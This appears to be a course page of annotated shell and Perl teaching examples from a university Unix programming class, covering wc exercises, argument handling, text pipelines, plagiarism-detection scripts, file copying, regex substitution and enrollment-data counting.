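One possible change, sketched on invented sample data (the two temporary files and their contents are assumptions standing in for enrollments and program_codes). In the enrollments file a program with no "/stream" suffix is padded with spaces, for example `8543  `, and `cut -d/ -f1` passes that padding through to join. Deleting the spaces with tr before sorting removes it.

```shell
export LC_ALL=C   # keep sort and join collation consistent

# Invented stand-ins for the enrollments and program_codes files.
enrol=$(mktemp)
progs=$(mktemp)
cat >"$enrol" <<'EOF'
COMP2041|5000001|Example, Alice|3978/1|COMPA1|070.000|17s2|19990101|F
COMP9041|5000002|Example, Bob|8543  |COMPCS|065.000|17s2|19980202|M
COMP9041|5000003|Example, Carol|8543  |COMPCS|072.000|17s2|19970303|F
EOF
cat >"$progs" <<'EOF'
3978 Computer Science
8543 Information Technology
EOF

tally=$(grep -E '^COMP[29]041' "$enrol" |
    cut -d'|' -f4 |
    cut -d/ -f1 |
    tr -d ' ' |                  # strip the padding left in codes such as "8543  "
    sort | uniq -c |
    join -1 2 -a 1 - "$progs" |
    sort -k2,2nr)                # numeric, descending, on the count field only

echo "$tally"
rm -f "$enrol" "$progs"
```

Other ways of removing the padding, such as `cut -c1-4` or a sed substitution, would work equally well; tr is used here only because it is the shortest.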
  5. Lecture exercises on wc:
    1. how many different programs does UNSW offer?
      wc -l program_codes
      1798 program_codes
      
    2. how many times was WebCMS accessed?
      wc -l access_log
      59779 access_log
      
    3. how many students are studying in CSE?
      wc -l enrollments
      7569 enrollments
      

      The above solutions assume that we're talking about total enrollments. If the question actually meant how many distinct individuals are studying courses offered by CSE, then we'd answer it as:

      cut -d'|' -f2 enrollments | sort | uniq | wc -l
      3791
      
    4. how many words are there in the book?
      wc -w book
      60428 book
      
    5. how many lines are there in the story?
      wc -l story
      87 story
      

Shell: lecture slides, lecture notes
External resources: Shell commands for power users.


A simple shell script demonstrating access to arguments.

echo My name is $0
echo My process number is $$
echo I have $# arguments
echo My arguments separately are $*
echo My arguments together are "$@"
echo My 5th argument is "'$5'"

l [file|directories...] - list files

Short Shell scripts can be used for convenience.

Note: "$@" like $* expands to the arguments to the script, but preserves the integrity of each argument if it contains spaces.

ls -las "$@"
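The difference between "$@" and $* can be seen in a small sketch. The helper function `count_args` and the file names are hypothetical, and the default IFS is assumed.

```shell
# Hypothetical helper: reports how many arguments it received.
count_args() {
    echo $#
}

set -- "my file.txt" notes.txt   # two arguments, the first contains a space

quoted=$(count_args "$@")   # each argument is kept intact
unquoted=$(count_args $*)   # arguments are re-split on whitespace

echo "$quoted $unquoted"    # prints "2 3"
```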

Count the number of times each different word occurs in the files given as arguments, e.g. word_frequency.sh dracula.txt

sed 's/ /\n/g' "$@"|      # convert to one word per line
tr A-Z a-z|               # map uppercase to lower case
sed "s/[^a-z']//g"|       # remove all characters except a-z and '
egrep -v '^$'|            # remove empty lines
sort|                     # place words in alphabetical order
uniq -c|                  # use uniq to count how many times each word occurs
sort -n                   # order words in frequency of occurrence

Change the names of the specified files to lower case.

Note the use of test to check if the new filename differs from the old.

The perl utility rename provides a more general alternative.

Note without the double quotes below filenames containing spaces would be handled incorrectly.

Note also the use of -- to avoid mv interpreting a filename beginning with - as an option.

However, a file named -n or -e will still break the script, because echo will treat the name as an option.

if test $# = 0
then
    echo "Usage: $0 <files>" 1>&2
    exit 1
fi

for filename in "$@"
do
    new_filename=`echo "$filename" | tr A-Z a-z`
    test "$filename" = "$new_filename" && continue
    if test -e "$new_filename"
    then
        echo "$0: $new_filename exists" 1>&2
    elif test -e "$filename"
    then
        mv -- "$filename" "$new_filename"
    else
        echo "$0: $filename not found" 1>&2
    fi
done
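The echo caveat noted before the script can be avoided by using printf with a %s format, which prints its argument literally whatever it looks like. A minimal sketch of just the name conversion, with a sample filename chosen for illustration:

```shell
filename="-E"   # bash's builtin echo would treat this as an option

# printf '%s\n' never interprets its argument as an option.
new_filename=$(printf '%s\n' "$filename" | tr A-Z a-z)

echo "result: $new_filename"   # prints "result: -e"
```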

Repeatedly download a specified web page until a specified regexp matches its source then notify the specified email address.

For example:

repeat_seconds=300  #check every 5 minutes

if test $# = 3
then
    url=$1
    regexp=$2
    email_address=$3
else
    echo "Usage: $0 <url> <regex> <email-address>" 1>&2
    exit 1
fi

while true
do
    if wget -O- -q "$url"|egrep "$regexp" >/dev/null
    then
        echo "Generated by $0" | mail -s "$url now matches $regexp" "$email_address"
        exit 0
    fi
    sleep $repeat_seconds
done

Print the integers 1..n if 1 argument given.

Print the integers n..m if 2 arguments given.

if test $# = 1
then
    start=1
    finish=$1
elif test $# = 2
then
    start=$1
    finish=$2
else
    echo "Usage: $0 <start> <finish>" 1>&2
    exit 1
fi

for argument in "$@"
do
    if echo "$argument"|egrep -v '^-?[0-9]+$' >/dev/null
    then
        echo "$0: argument '$argument' is not an integer" 1>&2
        exit 1
    fi
done

number=$start
while test $number -le $finish
do
    echo $number
    number=`expr $number + 1`    # or number=$(($number + 1))
done

Print the integers 1..n if 1 argument given.

Print the integers n..m if 2 arguments given.

This version uses the (( )) arithmetic syntax of bash instead of test and expr.

if (($# == 1))
then
    start=1
    finish=$1
elif (($# == 2))
then
    start=$1
    finish=$2
else
    echo "Usage: $0 [<start>] <finish>" 1>&2
    exit 1
fi

for argument in "$@"
do
    if echo "$argument"|egrep -v '^-?[0-9]+$' >/dev/null
    then
        echo "$0: argument '$argument' is not an integer" 1>&2
        exit 1
    fi
done

number=$start
while ((number <= finish))
do
    echo $number
    number=$((number + 1))
done
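
The integer check above starts an egrep process for every argument. A sketch of the same check using only the shell's case patterns, assuming a POSIX shell; is_integer is a hypothetical name. Like the regexp ^-?[0-9]+$ it accepts an optional leading minus sign followed by one or more digits:

```shell
# is_integer is a hypothetical helper: succeeds if $1 is an optional
# minus sign followed by one or more digits.
is_integer() {
    case "$1" in
        ''|-) return 1 ;;          # empty string or a lone minus sign
        -*)   rest=${1#-} ;;       # strip one leading minus sign
        *)    rest=$1 ;;
    esac
    case "$rest" in
        *[!0-9]*) return 1 ;;      # contains a character that is not a digit
    esac
    return 0
}

is_integer -42 && echo "-42 is an integer"
is_integer 4x2 || echo "4x2 is not an integer"
```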

Run as plagiarism_detection.simple_diff.sh <files>

Report if any of the files are copies of each other

The use of diff -iw means changes in white-space or case won't affect comparisons

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break
        if diff -i -w "$file1" "$file2" >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
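
The break in the inner loop means each pair of files is compared only once. A small sketch that prints the pairs the nested loops visit; print_pairs is a hypothetical name used only for this illustration:

```shell
# print_pairs is a hypothetical helper showing which pairs the
# nested loops above visit: each unordered pair exactly once.
print_pairs() {
    for file1 in "$@"
    do
        for file2 in "$@"
        do
            test "$file1" = "$file2" && break
            echo "$file1 $file2"
        done
    done
}

print_pairs a b c
# prints:
# b a
# c a
# c b
```

Note this relies on each filename appearing only once in the argument list.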

Improved version of plagiarism_detection.simple_diff.sh

The substitution s/\/\/.*// removes // style C comments.

This means changes in comments won't affect comparisons.

Note use of temporary files

TMP_FILE1=/tmp/plagiarism_tmp1$$
TMP_FILE2=/tmp/plagiarism_tmp2$$


for file1 in "$@"
do
    for file2 in "$@"
    do
        if test "$file1" = "$file2"
        then
            break # avoid comparing pairs of assignments twice
        fi
        sed 's/\/\/.*//' "$file1" >$TMP_FILE1
        sed 's/\/\/.*//' "$file2" >$TMP_FILE2
        if diff -i -w $TMP_FILE1 $TMP_FILE2 >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
rm -f $TMP_FILE1 $TMP_FILE2
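
Temporary file names built from $$ are predictable. A hedged sketch of the same comparison using mktemp to choose unused names; mktemp is assumed to be installed (it is not part of POSIX but is widely available on Linux and BSD systems), and same_ignoring_comments is a hypothetical name:

```shell
# same_ignoring_comments is a hypothetical helper: succeeds if the two
# files are the same after removing // comments, ignoring case and white space.
same_ignoring_comments() {
    tmp1=$(mktemp) || return 2
    tmp2=$(mktemp) || { rm -f "$tmp1"; return 2; }
    sed 's/\/\/.*//' "$1" >"$tmp1"
    sed 's/\/\/.*//' "$2" >"$tmp2"
    diff -i -w "$tmp1" "$tmp2" >/dev/null
    status=$?
    rm -f "$tmp1" "$tmp2"      # clean up before returning diff's exit status
    return $status
}
```

Inside the nested loops it could be used as: if same_ignoring_comments "$file1" "$file2"; then echo "$file1 is a copy of $file2"; fi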

Improved version of plagiarism_detection.comments.sh

This version converts C strings to the letter 's' and it converts identifiers to the letter 'v'.

Hence changes in strings & identifiers won't prevent detection of plagiarism.

The substitution s/"[^"]*"/s/g changes strings to the letter 's'.

This pattern won't match a few C strings, which is fine for our purposes.

The s/[a-zA-Z_][a-zA-Z0-9_]*/v/g changes all variable names to 'v' which means changes to variable names won't affect comparison.

Note this also may change function names, keywords etc.

This is fine for our purposes.

TMP_FILE1=/tmp/plagiarism_tmp1$$
TMP_FILE2=/tmp/plagiarism_tmp2$$
substitutions='s/\/\/.*//;s/"[^"]*"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break # don't compare pairs of assignments twice
        sed "$substitutions" "$file1" >$TMP_FILE1
        sed "$substitutions" "$file2" >$TMP_FILE2
        if diff -i -w $TMP_FILE1 $TMP_FILE2 >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
rm -f $TMP_FILE1 $TMP_FILE2
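
To see what the substitutions do, they can be applied to single lines of C. A minimal sketch, assuming the string pattern is "[^"]*" (a double quote, any characters that are not double quotes, then a double quote); normalise is a hypothetical name for the filtering step:

```shell
# assumed form of the substitutions: remove // comments,
# change strings to s, change identifiers to v
substitutions='s/\/\/.*//;s/"[^"]*"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

# normalise is a hypothetical name for the filtering step
normalise() {
    sed "$substitutions"
}

echo 'printf("total %d", count);' | normalise   # prints v(v, v);
echo 'x = y + 1;'                 | normalise   # prints v = v + 1;
echo 'total = count + 1;'         | normalise   # prints v = v + 1;
```

Note that the letter s produced for a string is itself an identifier, so the last substitution turns it into v. This does not matter for the comparison because both files are treated the same way.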

Improved version of plagiarism_detection.identifiers.sh

Note the use of sort so line reordering won't prevent detection of plagiarism.

TMP_FILE1=/tmp/plagiarism_tmp1$$
TMP_FILE2=/tmp/plagiarism_tmp2$$
substitutions='s/\/\/.*//;s/"[^"]*"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

for file1 in "$@"
do
    for file2 in "$@"
    do
        test "$file1" = "$file2" && break # don't compare pairs of assignments twice
        sed "$substitutions" "$file1"|sort >$TMP_FILE1
        sed "$substitutions" "$file2"|sort >$TMP_FILE2
        if diff -i -w $TMP_FILE1 $TMP_FILE2 >/dev/null
        then
            echo "$file1 is a copy of $file2"
        fi
    done
done
rm -f $TMP_FILE1 $TMP_FILE2

Improved version of plagiarism_detection.reordering.sh

Note the use of md5sum to calculate a cryptographic hash (http://en.wikipedia.org/wiki/MD5) of the modified file, and then the use of sort and uniq to find files with the same hash.

This allows execution time linear in the number of files

substitutions='s/\/\/.*//;s/"[^"]*"/s/g;s/[a-zA-Z_][a-zA-Z0-9_]*/v/g'

for file in "$@"
do
    echo `sed "$substitutions" "$file"|sort|md5sum` $file
done|
sort|
uniq -w32 -d --all-repeated=separate|
cut -c36-
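
The idea is that each file is reduced to one short fingerprint, so only one hash per file is needed rather than one diff per pair of files. A small sketch of the fingerprint step alone, assuming md5sum (GNU coreutils) is installed; fingerprint is a hypothetical name:

```shell
# fingerprint is a hypothetical helper: it prints the MD5 hash of its
# standard input after sorting the lines, so line order does not matter.
fingerprint() {
    sort | md5sum | cut -d' ' -f1
}

printf 'a = 1;\nb = 2;\n' | fingerprint
printf 'b = 2;\na = 1;\n' | fingerprint   # same hash as the line above
```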

Print all occurrences of executable programs with the specified names in $PATH

Note use of tr to produce a space-separated list of directories suitable for a for loop.

Breaks if directories contain spaces (fixing this left as an exercise).

if test $# = 0
then
    echo "Usage: $0 <program>" 1>&2
    exit 1
fi

for program in "$@"
do
    program_found=''
    for directory in `echo "$PATH" | tr ':' ' '`
    do
        f="$directory/$program"
        if test -x "$f"
        then
            ls -ld "$f"
            program_found=1
        fi
    done
    if test -z "$program_found"
    then
        echo "$program not found"
    fi
done
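
One way to split a colon-separated list without breaking on spaces is to let the shell split on colons via IFS. A minimal sketch of the splitting step only, assuming a POSIX shell; list_path_dirs is a hypothetical name:

```shell
# list_path_dirs is a hypothetical helper: prints each component of a
# colon-separated list on its own line, keeping spaces intact.
list_path_dirs() {
    old_ifs=$IFS
    IFS=:                 # split unquoted expansions on colons only
    set -f                # disable filename expansion while splitting
    for directory in $1
    do
        printf '%s\n' "$directory"
    done
    set +f
    IFS=$old_ifs
}

list_path_dirs '/usr/bin:/opt/my tools:/bin'
# prints:
# /usr/bin
# /opt/my tools
# /bin
```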

Print all occurrences of executable programs with the specified names in $PATH

Note use of tr to produce a list of directories one per line suitable for a while loop.

Won't work if directories contain spaces (fixing this left as an exercise)

if test $# = 0
then
    echo "Usage: $0 <program>" 1>&2
    exit 1
fi

for program in "$@"
do
    echo "$PATH"|
    tr ':' '\n'|
    while read directory
    do
        f="$directory/$program"
        if test -x "$f"
        then
            ls -ld "$f"
        fi
    done|
    egrep '.' || echo "$program not found"
done

Print all occurrences of executable programs with the specified names in $PATH

Note use of cut to extract each directory from $PATH by its index.

Won't work if directories contain new-lines (fixing this left as an exercise)

if test $# = 0
then
    echo "Usage: $0 <program>" 1>&2
    exit 1
fi
for program in "$@"
do
    program_found=''
    # the number of directories is one more than the number of colons in $PATH
    n_colons=`echo "$PATH"|tr -d -c :|wc -c`
    n_path_components=`expr $n_colons + 1`
    index=1
    while test $index -le $n_path_components
    do
        directory=`echo "$PATH"|cut -d: -f$index`
        f="$directory/$program"
        if test -x "$f"
        then
            ls -ld "$f"
            program_found=1
        fi
        index=`expr $index + 1`
    done
    test -n "$program_found" || echo "$program not found"
done

Perl Intro: lecture slides, lecture notes
External resources: perl.org documentation, FAQs & tutorials; a quick reference; course lecture notes; CSE CPAN mirror


compute Pythagoras' Theorem

print "Enter x: ";
$x = <STDIN>;
chomp $x;
print "Enter y: ";
$y = <STDIN>;
chomp $y;
$pythagoras = sqrt $x * $x + $y * $y;
print "The square root of $x squared + $y squared is $pythagoras\n";

Read numbers until end of input (or a non-number) is reached then print the sum of the numbers

$sum = 0;
while ($line = <STDIN>) {
    $line =~ s/^\s*//; # remove leading white space
    $line =~ s/\s*$//; # remove trailing white space
    # Test if string looks like an integer or real (scientific notation not handled!)
    if ($line !~ /^\d[.\d]*$/) {
        last;
    }
    $sum += $line;
}
print "Sum of the numbers is $sum\n";

Simple example reading a line of input and examining characters

printf "Enter some input: ";
$line = <STDIN>;
if (!defined $line) {
	die "$0: could not read any characters\n";
}
chomp $line;
$n_chars = length $line;
print "That line contained $n_chars characters\n";
if ($n_chars > 0) {
	$first_char = substr($line, 0, 1);
	$last_char = substr($line, $n_chars - 1, 1);
	print "The first character was '$first_char'\n";
	print "The last character was '$last_char'\n";
}

Reads lines of input until end-of-input

Print snap! if two consecutive lines are identical

print "Enter line: ";
$last_line = <STDIN>;
print "Enter line: ";
while ($line = <STDIN>) {
	if ($line eq $last_line) {
		print "Snap!\n";
	}
    $last_line = $line;
	print "Enter line: ";
}

create a string of size 2^n by concatenation

die "Usage: $0 <n>\n" if @ARGV != 1;
$n = 0;
$string = '@';
while ($n  < $ARGV[0]) {
    $string = "$string$string";
    $n++;
}
printf "String of 2^%d = %d characters created\n", $n, length $string;

Perl implementation of /bin/echo. This version always writes a trailing space.

foreach $arg (@ARGV) {
    print $arg, " ";
}
print "\n";

Perl implementation of /bin/echo

print "@ARGV\n";

Perl implementation of /bin/echo

print join(" ", @ARGV), "\n";

Perl Arrays: lecture slides, lecture notes


while (1) {
    print "Enter array index: ";
    $n = <STDIN>;
    if (!$n) {
        last;
    }
    chomp $n;
    $a[$n] = 42;
    print "Array element $n now contains $a[$n]\n";
    printf "Array size is now %d\n", $#a+1;
}

Sum integers supplied as command line arguments. No check is made that the arguments are numeric.

$sum = 0;
foreach $arg (@ARGV) {
	$sum += $arg;
}
print "Sum of the numbers is $sum\n";

Count the number of lines on standard input.

$line_count = 0;
while (1) {
    $line = <STDIN>;
    last if !$line;
    $line_count++;
}
print "$line_count lines\n";

Count the number of lines on standard input - slightly more concise

$line_count = 0;
while (<STDIN>) {
    $line_count++;
}
print "$line_count lines\n";

Count the number of lines on standard input - using backwards while to be really concise

$line_count = 0;
$line_count++ while <STDIN>;
print "$line_count lines\n";

Count the number of lines on standard input. Read the input into an array and use the array size.

@lines = <STDIN>;
print $#lines+1, " lines\n";

Count the number of lines on standard input.

Assignment to () forces a list context and hence reading all lines of input.

The special variable $. contains the current line number

() = <STDIN>;
print "$. lines\n";

Print lines read from stdin in reverse order.

In a C-style

while ($line = <STDIN>) {
    $line[$line_number++] = $line;
}


for ($line_number = $#line; $line_number >= 0 ; $line_number--) {
    print $line[$line_number];
}

Print lines read from stdin in reverse order.

Using <> in a list context

@line = <STDIN>;
for ($line_number = $#line; $line_number >= 0 ; $line_number--) {
    print $line[$line_number];
}

Print lines read from stdin in reverse order.

Using <> in a list context & reverse

@lines = <STDIN>;
print reverse @lines;


Print lines read from stdin in reverse order.

Using <> in a list context & reverse

print reverse <STDIN>;


Print lines read from stdin in reverse order.

Using push & pop

while ($line = <STDIN>) {
    push @lines, $line;
}
while (@lines) {
    my $line = pop @lines;
    print $line;
}

Print lines read from stdin in reverse order.

More succinctly with pop

@lines = <STDIN>;
while (@lines) {
    print pop @lines;
}

Print lines read from stdin in reverse order.

Using unshift

while ($line = <STDIN>) {
    unshift @lines, $line;
}
print @lines;

Simple cp implementation using line by line I/O

die "Usage: $0 <infile> <outfile>\n" if @ARGV != 2;

$infile = shift @ARGV;
$outfile = shift @ARGV;

open my $in, '<', $infile or die "Cannot open $infile: $!";
open my $out, '>', $outfile or die "Cannot open $outfile: $!";

while ($line = <$in>) {
    print $out $line;
}

close $in;
close $out;
exit 0;

Simple cp implementation using line by line I/O relying on the default variable $_

die "Usage: $0 <infile> <outfile>\n" if @ARGV != 2;

$infile = shift @ARGV;
$outfile = shift @ARGV;

open my $in, '<', $infile or die "Cannot open $infile: $!";
open my $out, '>', $outfile or die "Cannot open $outfile: $!";

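# loop could also be written in one line:
# print $out $_ while <$in>;

# note $_ must be given explicitly when printing to a lexical filehandle:
# print $out; would print the value of $out to standard output
while (<$in>) {
    print $out $_;
}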

close $in;
close $out;
exit 0;

Simple cp implementation reading the entire file into an array. Note that <> returns a list of lines in a list context (in a scalar context it returns a single line).

die "Usage: $0 <infile> <outfile>\n" if @ARGV != 2;

$infile = shift @ARGV;
$outfile = shift @ARGV;

open my $in, '<', $infile or die "Cannot open $infile: $!";
@lines = <$in>;
close $in;

open my $out, '>', $outfile or die "Cannot open $outfile: $!";
print $out @lines;
close $out;

exit 0;

Simple cp implementation via system!

Will break if filenames contain single quotes

die "Usage: $0 <infile> <outfile>\n" if @ARGV != 2;

$infile = shift @ARGV;
$outfile = shift @ARGV;

exit system "/bin/cp '$infile' '$outfile'";

Simple cp implementation reading the entire file into a scalar. $/ contains the line separator for Perl; if it is undefined we can slurp an entire file into a scalar variable with a single read.

die "Usage: cp <infile> <outfile>\n" if @ARGV != 2;
$infile = shift @ARGV;
$outfile = shift @ARGV;

undef $/;
open my $in, '<', $infile or die "Cannot open $infile: $!";
$contents = <$in>;
close $in;

open my $out, '>', $outfile or die "Cannot open $outfile: $!";
print $out $contents;
close $out;

exit 0;

Reads lines of input until end-of-input

Print snap! if a line has been seen previously

while (1) {
	print "Enter line: ";
	$line = <STDIN>;
	if (!defined $line) {
		last;
	}
	if ($seen{$line}) {
		print "Snap!\n";
	}
	$seen{$line}++;
}

More concise version of snap_memory.0.pl

while (1) {
	print "Enter line: ";
	$line = <STDIN>;
	last if !defined $line;
	print "Snap!\n" if $seen{$line};
	$seen{$line} = 1;
}

Run as ./expel_student mark_deductions.txt. Find the student with the largest mark deductions and expel them.

while ($line = <>) {
    chomp $line;
    $line =~ s/^"//;
    $line =~ s/"$//;
    my ($name,$offence,$date,$penalty);
    ($name,$offence,$date,$penalty) = split /"\s*,\s*"/, $line;
    $penalty =~ s/[^0-9]//g;
    $deduction{$name} += $penalty;
}

$worst = 0;
foreach $student (keys %deduction) {
    $penalty = $deduction{$student};
    if ($penalty > $worst) {
        $worst_student = $student;
        $worst = $penalty;
    }
}
print "Expel $worst_student who had $worst marks deducted\n";

Print the nth word on every line of the input files/stdin. Output is piped through fmt to make reading easy.

die "Usage: $0 <n> <files>\n" if !@ARGV;
$nth_word = shift @ARGV;
open my $f, '|-', "fmt -w 40" or die "Can not run fmt: $!\n";
while ($line = <>) {
    chomp $line;
    @words = split(/ /, $line);
    print $f "$words[$nth_word]\n" if $words[$nth_word];
}
close $f;

Perl Regex: lecture slides, lecture notes
External resources: regex summary


For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

Modified text is stored in a new file which is then renamed to replace the old file

foreach $filename (@ARGV) {
    $tmp_filename = "$filename.new";
    die "$0: $tmp_filename already exists" if -e "$tmp_filename";
    open my $f, '<', $filename or die "$0: Can not open $filename: $!";
    open my $g, '>', $tmp_filename or die "$0: Can not open $tmp_filename : $!";
    while ($line = <$f>) {
        $line =~ s/Herm[io]+ne/Zaphod/g;
        $line =~ s/Harry/Hermione/g;
        $line =~ s/Zaphod/Harry/g;
        print $g $line;
    }
    close $f;
    close $g;
    rename "$tmp_filename", $filename or die "$0: Can not rename file";
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

Modified text is stored in an array then the file is over-written

foreach $filename (@ARGV) {
    open my $f, '<', $filename or die "$0: Can not open $filename: $!";
    $line_count = 0;
    @new_lines = ();    # discard lines left over from the previous file
    while ($line = <$f>) {
        $line =~ s/Herm[io]+ne/Zaphod/g;
        $line =~ s/Harry/Hermione/g;
        $line =~ s/Zaphod/Harry/g;
        $new_lines[$line_count++] = $line;
    }
    close $f;
    open my $g, '>', $filename or die "$0: Can not open $filename : $!";
    print $g @new_lines;
    close $g;
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

Modified text is stored in an array then the file is over-written

foreach $filename (@ARGV) {
    open my $f, '<', $filename or die "$0: Can not open $filename: $!";
    @lines = <$f>;
    close $f;

    # note loop variable $line is aliased to array elements
    # changes to it change the corresponding array element
    foreach $line (@lines) {
        $line =~ s/Herm[io]+ne/Zaphod/g;
        $line =~ s/Harry/Hermione/g;
        $line =~ s/Zaphod/Harry/g;
    }

    open my $g, '>', $filename or die "$0: Can not open $filename : $!";
    print $g @lines;
    close $g;
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text. The text is read into a string, the string is changed, then the file is over-written.

See http://www.perlmonks.org/?node_id=1952 for an alternative way to read a file into a string

foreach $filename (@ARGV) {
    open my $f, '<', $filename or die "$0: Can not open $filename: $!";
    $novel = '';    # start each file with an empty string
    while ($line = <$f>) {
        $novel .= $line;
    }
    close $f;

    $novel =~ s/Herm[io]+ne/Zaphod/g;
    $novel =~ s/Harry/Hermione/g;
    $novel =~ s/Zaphod/Harry/g;

    open my $g, '>', $filename or die "$0: Can not open $filename : $!";
    print $g $novel;
    close $g;
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

The unix filter-like behaviour of <> is used to read files

Perl's -i option is used to replace file with output from script

while ($line = <>) {
    $line =~ s/Herm[io]+ne/Zaphod/g;
    $line =~ s/Harry/Hermione/g;
    $line =~ s/Zaphod/Harry/g;
    print $line;
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

The unix filter-like behaviour of <> is used to read files

Perl's -i option is used to replace file with output from the script.

Perl's default variable $_ is used

while (<>) {
    s/Herm[io]+ne/Zaphod/g;
    s/Harry/Hermione/g;
    s/Zaphod/Harry/g;
    print;
}

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

Perl's -p option is used to produce unix filter-like behaviour.

Perl's -i option is used to replace file with output from the script.

s/Herm[io]+ne/Zaphod/g;
s/Harry/Hermione/g;
s/Zaphod/Harry/g;
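
A sketch of how the -p and -i options might be combined on the command line, assuming perl is installed; swap_names is a hypothetical wrapper, and the -e option is used here to pass the substitutions inline instead of in a script file:

```shell
# swap_names is a hypothetical wrapper: it edits the named files in place.
# -p wraps the code in a read-and-print loop over each input line
# -i writes the output back to the file being read
# -e supplies the Perl code on the command line
swap_names() {
    perl -p -i -e 's/Herm[io]+ne/Zaphod/g; s/Harry/Hermione/g; s/Zaphod/Harry/g' "$@"
}
```

With no suffix, -i keeps no backup copy of the original file; -i.bak would keep one with .bak appended to the filename.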

Fetch a web page, removing HTML tags and character entities (e.g. &amp;)

Lines between script or style tags are skipped.

Non-blank lines are printed

There are better ways to fetch web pages (e.g. HTTP::Request::Common)

The regex code below doesn't handle a number of cases. It is often better to use a library to properly parse HTML before processing it.

But beware illegal HTML is common & often causes problems for parsers.

foreach $url (@ARGV) {
    open my $f, '-|', "wget -q -O- '$url'" or die;
    while ($line = <$f>) {
        if ($line =~ /^\s*<(script|style)/i) {
            while ($line = <$f>) {
                last if $line =~ /^\s*<\/(script|style)/i;
            }
        } else {
            $line =~ s/&\w+;/ /g;
            $line =~ s/<[^>]*>//g;
            print $line if $line =~ /\S/;
        }
    }
    close $f;
}

Fetch a web page, removing HTML tags.

The contents of script or style tags are removed.

Non-blank lines are printed

The regex code below doesn't handle a number of cases. It is often better to use a library to properly parse HTML before processing it.

But beware illegal HTML is common & often causes problems for parsers.

Note the use of the s modifier to allow . to match a newline.

use LWP::Simple;
foreach $url (@ARGV) {
	$html = get $url;
	$html =~ s/<script.*?<\/script>//isg;  # remove script tags including contents
	$html =~ s/<style.*?<\/style>//isg;    # remove style tags including contents
    $html =~ s/<.*?>//isg; # remove tags
    $html =~ s/\n\s*\n/\n/ig;  # blank lines
    print $html;
}

Find the positive integers among input text and print their sum and mean

Note regexp to split on non-digits

Note check to handle empty string from split

@input_text_array = <>;
$input_text_array = join "", @input_text_array;

@numbers = split(/\D+/, $input_text_array);
print join(",", @numbers), "\n";

foreach $number (@numbers) {
	if ($number ne '') {
		$total += $number;
		$n++;
	}
}

if (@numbers) {
	printf "$n numbers: total $total mean %s\n", $total/$n;
}

Find integers (positive and negative) among input text and print their sum and mean

Note regexp to match number: -?\d+

Harder to use split here (unlike just positive integers)

@input_text_array = <>;
$input_text_array = join "", @input_text_array;

@numbers = $input_text_array =~ /-?\d+/g;

foreach $number (@numbers) {
	$total += $number;
}

if (@numbers) {
	$n = @numbers;
	printf "$n numbers: total $total mean %s\n", $total/$n;
}

Print the last number (real or integer) on every line if there is one.

Note regexp to match number: -?\d+(\.\d+)?

while ($line = <>) {
	if ($line =~ /(-?\d+(\.\d+)?)\D*$/) {
		print "$1\n";
	}
}

count how many people enrolled in each course

open my $f, '<', "course_codes" or die "$0: can not open course_codes: $!";
while ($line = <$f>) {
    chomp $line;
    $line =~ /([^ ]+) (.+)/ or die "$0: bad line format '$line'";
    $course_names{$1} = $2;
}
close $f;

while ($course = <>) {
    chomp $course;
    $course =~ s/\|.*//;
    $count{$course}++;
}

foreach $course (sort keys %count) {
    print "$course_names{$course} has $count{$course} students enrolled\n";
}

Run as count_first_names.pl enrollments. Count how many people enrolled have each first name.

while ($line = <>) {
    @fields = split /\|/, $line;
    $student_number = $fields[1];
    next if $already_counted{$student_number};
    $already_counted{$student_number} = 1;
    $full_name = $fields[2];
    $full_name =~ /.*,\s+(\S+)/ or next;
    $first_name = $1;
    $fn{$first_name}++;
}

foreach $first_name (sort keys %fn) {
    printf "There are %2d people with the first name $first_name\n", $fn{$first_name};
}



run as duplicate_first_names.pl /home/cs2041/public_html/11s2/lec/perl/examples/enrollments

Report cases where there are multiple people with the same first name enrolled in a course

while ($line = <>) {
    @fields = split /\|/, $line;
    $course = $fields[0];
    $full_name = $fields[2];
    $full_name =~ /.*,\s+(\S+)/ or next;
    $first_name = $1;
    $cfn{$course}{$first_name}++;
}

foreach $course (sort keys %cfn) {
    foreach $first_name (sort keys %{$cfn{$course}}) {
        next if $cfn{$course}{$first_name} < 2;
        printf "In $course there are %d people with the first name $first_name\n", $cfn{$course}{$first_name};
    }
}



Run as course_first_names.pl enrollments. Report cases where there are multiple people with the same first name enrolled in a course.

while ($line = <>) {
    @fields = split /\|/, $line;
    $course = $fields[0];
    $full_name = $fields[2];
    $full_name =~ /.*,\s+(\S+)/ or next;
    $first_name = $1;
    $cfn{$course}{$first_name}++;
}

foreach $course (sort keys %cfn) {
    foreach $first_name (sort keys %{$cfn{$course}}) {
        next if $cfn{$course}{$first_name} < 2;
        printf "In $course there are %d people with the first name $first_name\n", $cfn{$course}{$first_name};
    }
}



For each course specified as an argument, print a summary of the other courses taken by students in this course

$enrollment_file = shift @ARGV or die;
$debug = 0;

open my $c, '<', "course_codes" or die "$0: can not open course_codes: $!";
while (<$c>) {
    ($code, $name) = /\s*(\S+)\s+(.*)/ or die "$0: invalid course codes line: $_";
    $course_name{$code} = $name;
    print STDERR "code='$code' -> name='$name'\n" if $debug;
}
close $c;

open my $f, '<', $enrollment_file or die "$0: can not open $enrollment_file: $!";
while (<$f>) {
    ($course,$upi,$name) = split /\s*\|\s*/;
    push @{$course{$upi}}, $course;
    $name =~ s/(.*), (.*)/$2 $1/;
    $name =~ s/ .* / /;
    $name{$upi} = $name;
}
close $f;

